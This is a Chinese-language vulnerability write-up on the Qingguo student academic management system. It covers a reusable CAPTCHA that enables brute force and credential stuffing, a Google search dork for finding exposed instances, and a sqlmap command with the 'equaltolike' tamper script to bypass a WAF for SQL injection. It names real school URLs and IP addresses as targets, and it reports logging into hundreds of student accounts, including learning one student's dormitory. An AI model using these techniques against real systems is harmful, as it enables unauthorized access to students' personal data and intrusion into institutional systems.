一、验证码可重复利用导致撞库漏洞
今年,随着国外Gmail及国内多个大型电商受到撞库攻击,撞库已然成为高危漏洞。通过撞库,黑客可成功窃取大量账户作为进一步攻击的手段,现在全国多个高校在用的青果教务系统验证码未处理导致可重复利用,最终经过一些暴力枚举可获取学生信息
谷歌:intitle:"学生综合管理系统" inurl:"xsweb" 可以获得不少青果管理系统
主站登陆处
案例1.http://xsweb.uvu.edu.cn/
首先通过社工得到学号:
http://zhidao.baidu.com/link?url=Yjp5QaLrzSDK9GQUuKROAtvvNH9iRGbqIJ8I7xsfAX0hfyrilWCR2WXsX14deKXmT_iHQggLbBzszA_EeYd9Kq
登陆后抓包,设定账户密码都为2013100000-2013100410爆破400+账户发现成功了300
登陆一个2013100334
还知道他宿舍在哪儿
案例2.http://jw.ynjtc.com/xsweb 密码123456测试即可得160账户
账户密码相同的也有22个
案例3.http://219.228.48.108:81/xsweb/
扫110201000-110201999 1000账户中账户密码相同的有100+
案例4.http://121.8.99.242/xsweb
二、SQL注入漏洞[WAF绕过方法:--tamper "equaltolike.py"]
0x00 注入点1:
1.http://xsweb.uvu.edu.cn/default.aspx
点击上面检索后抓包类似如下:
使用python sqlmap.py -r 1.txt --tamper "equaltolike.py" --is-dba --dbs 即可绕过WAF
2.http://jw.ynjtc.com/xsweb
3.http://219.228.48.108:81/xsweb/
0x01 注入点2:
http://219.228.48.108:81
抓包类似如下:
0x02 注入点3
0x03 注入点4
0x04 注入点5、6、7、8
0x05 注入点9、10【抓包加'没回显的注入】